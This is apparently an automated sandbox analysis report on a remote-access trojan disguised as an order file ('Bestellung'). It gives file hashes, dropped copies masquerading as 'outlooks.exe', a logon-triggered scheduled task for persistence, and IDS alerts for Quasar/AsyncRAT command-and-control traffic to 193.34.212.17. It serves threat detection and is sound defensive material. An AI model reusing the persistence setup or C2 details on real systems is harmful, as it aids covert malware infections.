MD5: 17BEFAA16080E50413FB7DA8FF6AF91B
SHA1: ECF58B127FC3C252C0B43E843FD4637DDFE7637F
SHA-256: 3315AF1CBF58813AE0FB3973EE03327FE48048FF0AF07A9341B60743C8F4AEED
SHA-512: FB4EDB25C053054B0D66AB643D3489EAB1044D9ACC8F33E4BAD0FDD81ED8643EA4D3A402CD1DBF7E56210F5A951B33F265BB150BA45E5DAEB05D1E637506DAFC
Malicious: false
Preview: @...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Note: this is the probe script PowerShell writes to the user's temporary folder at start-up to test whether an AppLocker or WDAC script-enforcement policy is in effect. Its presence records only that powershell.exe was started; it is not content the sample authored.
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:true
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                          Process:C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                                                                          File Type:XML 1.0 document, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):1585
                                                                          Entropy (8bit):5.116600636957861
                                                                          Encrypted:false
                                                                          SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtxxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT3v
                                                                          MD5:CEF9DDD11786D93E245BC2F7AFEA2695
                                                                          SHA1:B0B56D8A0526FBF87BD5AEEA34173EAF791CB548
                                                                          SHA-256:C2EE4D84CFB927B657FB902D6D84876A95F1D71045C1B3189951753CF7E600CD
                                                                          SHA-512:939E3C048105CCCDB6A9DCF2C690B3F3D4E26215541A86010F39D7762AC16CBD8BAE7B6A1D3DB01ED8B767956C5B148BB0C8F12BF27F7C52D2C27F8A62F2B1F4
                                                                          Malicious:false
                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3842568
                                                                          Entropy (8bit):7.9808921731023705
                                                                          Encrypted:false
                                                                          SSDEEP:98304:ZrAsTIZbqqBQjwske/pCT66UNYekeWY0CE9:ZcCSL0ke/pO5ekeWtCE9
                                                                          MD5:15F259B30EC72A5217144834F7F5B564
                                                                          SHA1:BAED3FE7D059A497F856E263431CCD3872EF1EA1
                                                                          SHA-256:01DE053D9560D419F0B6C35DBDDB1175EB1FD7A21450989332024B812D39C4C2
                                                                          SHA-512:5E1148A9CF8008B7C38D067EC34E5C3BC7255341D114476532F8111EA2C3E654EB70B0A439AAAEA22543576F09B9CEC269F9B3414A6A24FC54B89C7C677C5F47
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0...:..P.......8:.. ...@:...@.. ........................:...........@.................................P8:.K....@:.hM...........l:..6....:...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...hM...@:..N....:.............@..@.reloc........:......j:.............@..B.................8:.....H.........9...................9..........................................Fpn..|8.&}4.ah..kp.z...`...r6...B.L9.P..Pj$.P^I..;...7..M...t... ..;}. B...M.....Z.z4.........4'@.g.+..'..Q.....am.....1...........:.<.....U..`.a.5..w#.Yw..0v.v.N..=..d....J.L.{.........5O.....X.s7.T.7Z...izt.R.OS.B..n$[b..{-...yDwj{U.n..E.U.9?.s%.IH..s.;.....?.. .........%....BH.h`.7...2o...U.k............X2\.{.6...|...".}...<.0.../....A.j....@i^.e.,.s..........0..........(....*...0..
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3842568
                                                                          Entropy (8bit):7.9808921731023705
                                                                          Encrypted:false
                                                                          SSDEEP:98304:ZrAsTIZbqqBQjwske/pCT66UNYekeWY0CE9:ZcCSL0ke/pO5ekeWtCE9
                                                                          MD5:15F259B30EC72A5217144834F7F5B564
                                                                          SHA1:BAED3FE7D059A497F856E263431CCD3872EF1EA1
                                                                          SHA-256:01DE053D9560D419F0B6C35DBDDB1175EB1FD7A21450989332024B812D39C4C2
                                                                          SHA-512:5E1148A9CF8008B7C38D067EC34E5C3BC7255341D114476532F8111EA2C3E654EB70B0A439AAAEA22543576F09B9CEC269F9B3414A6A24FC54B89C7C677C5F47
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0...:..P.......8:.. ...@:...@.. ........................:...........@.................................P8:.K....@:.hM...........l:..6....:...................................................... ............... ..H............text.....:.. ....:................. ..`.rsrc...hM...@:..N....:.............@..@.reloc........:......j:.............@..B.................8:.....H.........9...................9..........................................Fpn..|8.&}4.ah..kp.z...`...r6...B.L9.P..Pj$.P^I..;...7..M...t... ..;}. B...M.....Z.z4.........4'@.g.+..'..Q.....am.....1...........:.<.....U..`.a.5..w#.Yw..0v.v.N..=..d....J.L.{.........5O.....X.s7.T.7Z...izt.R.OS.B..n$[b..{-...yDwj{U.n..E.U.9?.s%.IH..s.;.....?.. .........%....BH.h`.7...2o...U.k............X2\.{.6...|...".}...<.0.../....A.j....@i^.e.,.s..........0..........(....*...0..
                                                                          Process:C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.9808921731023705
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:Bestellung - 021224 - 901003637.exe
                                                                          File size:3'842'568 bytes
                                                                          MD5:15f259b30ec72a5217144834f7f5b564
                                                                          SHA1:baed3fe7d059a497f856e263431ccd3872ef1ea1
                                                                          SHA256:01de053d9560d419f0b6c35dbddb1175eb1fd7a21450989332024b812d39c4c2
                                                                          SHA512:5e1148a9cf8008b7c38d067ec34e5c3bc7255341d114476532f8111ea2c3e654eb70b0a439aaaea22543576f09b9cec269f9b3414a6a24fc54b89c7c677c5f47
                                                                          SSDEEP:98304:ZrAsTIZbqqBQjwske/pCT66UNYekeWY0CE9:ZcCSL0ke/pO5ekeWtCE9
                                                                          TLSH:250633497150F94FC853CA304FA0EDB9BE287D96E306C313A5D71DABF46E99A8E041D2
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0...:..P.......8:.. ...@:...@.. ........................:...........@................................
                                                                          Icon Hash:033424c4c199d839
                                                                          Entrypoint:0x7a389e
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x674E9F60 [Tue Dec 3 06:04:16 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                          Signature Valid:false
                                                                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                          Error Number:-2146869232
                                                                          Not Before, Not After
                                                                          • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                          Subject Chain
                                                                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                          Version:3
                                                                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                          Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3a3850 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3a4000 | 0x4d68 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3a6c00 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3aa000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3a18a4 | 0x3a1a00 | f34b8469619a2ab51e579629b7670fa1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x3a4000 | 0x4d68 | 0x4e00 | 900ec867e9d31d5d1f18ad30d0c6ff23 | False | 0.9449118589743589 | data | 7.788163390058187 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3aa000 | 0xc | 0x200 | 8dc44982f552ea9fd6e21d78c87d7f51 | False | 0.044921875 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 ":" | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3a4130 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094
RT_GROUP_ICON | 0x3a882c | 0x14 | data | | | 1.05
RT_VERSION | 0x3a8840 | 0x338 | data | | | 0.441747572815534
RT_MANIFEST | 0x3a8b78 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-03T14:53:52.621028+0100 | 2027619 | ET MALWARE Observed Malicious SSL Cert (Quasar CnC) | 1 | 193.34.212.17 | 5829 | 192.168.2.8 | 49713 | TCP
2024-12-03T14:53:52.621028+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 193.34.212.17 | 5829 | 192.168.2.8 | 49713 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 14:53:51.084609985 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:51.204581976 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:51.204720020 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:51.223316908 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:51.343363047 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:52.495695114 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:52.495810986 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
Dec 3, 2024 14:53:52.495860100 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:52.501071930 CET | 49713 | 5829 | 192.168.2.8 | 193.34.212.17
Dec 3, 2024 14:53:52.621027946 CET | 5829 | 49713 | 193.34.212.17 | 192.168.2.8
